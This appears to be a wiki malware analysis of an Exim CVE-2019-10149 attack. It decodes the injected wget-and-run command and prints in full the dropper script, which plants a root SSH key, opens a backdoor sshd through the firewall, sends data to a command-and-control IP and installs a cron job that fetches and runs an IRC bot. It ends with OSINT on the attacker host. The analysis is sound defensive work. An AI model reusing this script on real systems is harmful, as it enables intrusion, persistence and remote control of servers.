#acl All:read #lang en <> = Malware analysis = == Initial infection == It started this morning. I received a mail from my mailserver that it couldn't deliver an email. It looked like a normal email, but the recipient was what triggered me. The mailadres had some command injection. After some searching on the internet I ended up in some vulnerability in Exim versions 4.87 to 4.91 that made this possible. (CVE-2019-10149) But let's take a look at the mailadres. {{{ }}} I replaced the "\x" for the "%" to parse it as URL decode. Changed some characters and I ended up with the following command. We got a C&C server! ''45.148.10.84'' {{{ #!highlight bash numbers=disable /bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs" }}} == Initial malware == The ss executable contains the next code: {{{ #!highlight bash numbers=disable #!/bin/bash exists=$(grep -c "^jkl:" /etc/passwd) if [ $exists -eq 0 ]; then chattr -isa /root/.ssh/authorized_keys echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys /usr/sbin/sshd -p 322 /sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1 /sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1 /sbin/iptables-save >/dev/null 2>&1 /usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1 /usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1 /usr/sbin/iptables-save >/dev/null 2>&1 data2=`netstat -natp |grep sshd|base64` wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null cd /tmp echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink echo '* * * * * /tmp/twink' >mycron crontab -l >> mycron chmod +x /tmp/twink crontab mycron;rm -fr mycron else exit fi }}} This script will do the following: 1. Checks it the user "jkl" exists. If so, stop executing the script. * Add a public SSH key to the root user. * Start a SSH server listening on port 322. * Open the firewall for incoming and outgoing connection on port 322 and save it for reboots. * Show the current listening ports for the SSH server and send them in a POST request back to the C&C server. * Download a r.png file, run it trough perl and save it as the file ''twink''. * Put the downloaded script in the crontab and run it every minute. == Agent == The ''twink'' executable is a Perl IRC bot. You can find the code [[attachment:twink.pl|here]]. It's a really old script, but it still works. * It chooses a process name from a list and rename his own processname to hide his presence. * Do some preparations for connecting to the C&C server by IRC. * It takes a random IRC client version name. Most of them are from the mIRC IRC client. * It chooses a random username. * It chooses a random realname. * It chooses a random nickname. * It tries to connect to the IRC server on 45.148.10.84 on port 21, 8080 or 9999 * It listens for commands of the user ''evil'' with a hostmask of ''mfu.txt'' in the channel #root. == IRC C&C server == There is an IRC server on the IP 45.148.10.84. Let's connect to it and see how it's working: {{{ [09:08:24] Connecting to [45.148.10.84] on port 8080 [09:08:24] Connection to host established [09:08:25] -irc.evilcode.php- *** Looking up your hostname... [09:08:25] -irc.evilcode.php- *** Couldn't resolve your hostname; using your IP address instead [09:08:25] Welcome to the Don`t Use This ircd IRC Network XXXXX!XXXXX@XXX.XXX.XXX.XXX [09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6 [09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC [09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ [09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server [09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server [09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server [09:08:25] There are 1 users and 9 invisible on 1 servers [09:08:25] 1 operator(s) online [09:08:25] 4 channels formed [09:08:25] I have 10 clients and 0 servers [09:08:25] Current local users 10, max 232 [09:08:25] Current global users 10, max 232 [09:08:25] Message(422): MOTD File is missing [09:08:25] XXXXX sets mode +iwx }}} After we are connected, we automatically joined the channel ''#R''. There was nobody, except an OP user, named ''evil''. He had the next whois information. {{{ [09:12:18] evil has userhost fld@mfu.txt and real name “.” [09:12:18] evil is in @#R [09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!) [09:12:18] evil is a Network Administrator [09:12:18] evil is available for help. [09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds }}} This confirms our findings about the C&C control user in the [[attachment:twink.pl|twink.pl script]]. This is the user that could give the commands to the bot. We could also join the channel ''#root'', but that didn't changed anything. One OP user and one client user. I took some time to observe, but nothing was happening. = OSINT = == Vulnerabilities == || '''Name''' || '''CVE''' || '''Comment''' || || [[https://nvd.nist.gov/vuln/detail/CVE-2019-10149|NIST]] || CVE-2019-10149 || A flaw was found in Exim versions 4.87 to 4.91. || == IP Information == || '''Name''' || '''Status''' || || [[https://ipinfo.io/45.148.10.84|IP Info]] || Amsterdam, North Holland, Netherlands || == Abuse sites == || '''Name''' || '''Status''' || || [[https://www.abuseipdb.com/check/45.148.10.84|AbuseIPDB]] || 100% || || [[https://any.run/report/a727223651e5448f8fde65047cbba0e6758dac07200950a881b7bce06609f127/fe45370c-0eae-4af7-ae0d-8df26861ceac|any.run]] || Non windows || == Shodan == || '''Port''' || '''Service''' || '''Banner''' || || 22/TCP || SSH || SSH-2.0-OpenSSH_5.3 || ||<^|1> 80/TCP ||<^|1> Apache 2.2.15 || HTTP/1.1 403 Forbidden<
>Date: Sun, 29 Mar 2020 01:37:10 GMT<
>Server: Apache/2.2.15 (CentOS)<
>Accept-Ranges: bytes<
>Content-Length: 4961<
>Connection: close<
>Content-Type: text/html; charset=UTF-8 || || 5432/TCP || Unreal ircd || || || 8080/TCP || Unreal ircd || || || 9999/TCP || Unreal ircd || || == Pastebin == || '''Name''' || '''Status''' || || [[https://pastebin.com/kXFkemhf|kXFkemhf]] || First script || = Thanks = * https://blog.grospolina.org/index.php?/archives/18-email-von-service.com-twink-mycron-CVE-2019-1014.html